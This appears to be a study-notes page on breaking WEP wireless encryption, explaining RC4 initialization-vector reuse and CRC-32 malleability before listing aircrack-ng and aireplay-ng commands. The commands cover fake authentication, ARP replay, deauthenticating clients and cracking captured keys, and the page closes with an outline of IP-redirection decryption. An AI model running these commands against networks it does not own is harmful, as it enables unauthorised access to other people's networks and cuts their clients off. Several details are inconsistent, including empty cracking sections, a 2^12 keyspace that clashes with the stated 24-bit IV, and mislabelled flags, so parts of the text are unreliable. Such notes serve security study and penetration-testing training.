Skip to content

WEP

WEP (Wired Equivalent Privacy)

  • Key length 40 or 104. This is the same key for every device
  • Uses RC4 for authentication and encryption
  • Uses CRC-32 for checksum integrity
  • Key uses 24-bit initialization vector (IV)
  • Takes the IV + SharedKey as RC4 input

Key Reuse Attack

  • Is a Stream Cipher that uses the same key twice.
  • 50% probability the same IV will repeat after 5000 packets.
  • Key is a secret with a Rotating IV
  • IV is random but only has a keyspace of 2^12.
    • After 4K packets the seed will repeat with 50% probability (Todays networks thats 1 min)

Encryption

Encryption:

Shared_Key = K
Message = m

Chipher_n = (m || CRC-32(m)) xor RC4(IV || K)

Authentication:
1. AP sends 1024 bits of random data in clear text
2. Client sends back using the 1024 bit random as the message

Modification:
- The CRC is not good at detecting smart manipulation. This leads to Modification of the messages
- This can allow an attacker to add messages to the plaintext
- This only happens when the IV loops back creating the same cipher stream

(m || CRC-32(m)) xor RC4(IV || K) xor (e || d) = (m xor e || CRC-32(m) xor d ) xor RC4(IV || K)

Attacks

Fake Authentication Attack

If the From MAC Address is not associated with the Access Point then the AP rejects the packet.

To bypass this the MAC you use for injection must be associated with the AP.
This can be done by either using fake authentication or using a MAC from an already-associated client

Example:

aireplay-ng -1 0 -e <ESSID> -a <AP MAC> -h <Your MAC> <interface>

  • -1: Selects this attack type (fake authentication attack)
  • 0 : specifies the reassociation timing
  • -e: ESSID Name (wireless network name)
  • -a: The access point's Mac address
  • -h: The monitor mode interface

More timing between attacks Example:

aireplay-ng -1 6000 -o 1 -q 10 -e <ESSID> -a <AP MAC> -h <Your MAC><interface>

  • -o: sends a single packet at a time
  • -q: sends keepalives every x (10 in this case) seconds

ARP Replay Attack

Replaying ARP messages when you get them can allow more IVs to be generated by the AP which makes it easier to crack.

#aireplay-ng -3 -b <AP MAC> -h <Your MAC><interface> 
aireplay-ng -3 -b 34:08:04:09:3D:38 -h 00:1F:33:F3:51:13 mon0

Deauthentication Client

This is used to Get a new connection to the client with a new IV. 

aireplay-ng -0 1 -a <AP MAC> -c <Client MAC><interface>

Cracking the IVs

  • 250,000 IVs are recommended for cracking 64-bit keys
  • 1,500,000 IVs are recommended for cracking 128-bit keys

Cracking 32bit keys:

aircrack-ng <capture>

Cracking 64bit keys:

Cracking 128bit keys:

Cracking

Active attacks were developed which allows an attacker to generate sufficient traffic to crack a 104-bit key in very short timeframes.

To crack WEP for a given essid name and store into a file

aircrack-ng -a 1 -e <essid> -l <output file> <.cap or .ivs file(s)>

To crack a given essid (WEP) and display the ASCII of the key

aircrack-ng -e <essid> -s <.cap of .ivs file(s)>`

To crack a given essid (WEP) and create a EWSA Project

aircrack-ng -e <essid> -E <EWSA file> <.cap or .ivs file(s)>

IP Redirection

If we are able to Trick the access point into decrypting the packet for us by claiming the destination IP as our IP then we can receive the decrypted packet.

Part 1 is knowing the source and destination IP you can change the destination IP. This is done by XORing the destination IP at the right point and putting the new address in. The thing it that this changes the CRC checksum.

Part 2 the CRC check sum is easily bypassed by selecting the correct IP to send it to. But other bites need to change to make the check sum valid again. This can be fixed by changing the source IP address in the same way in part 1.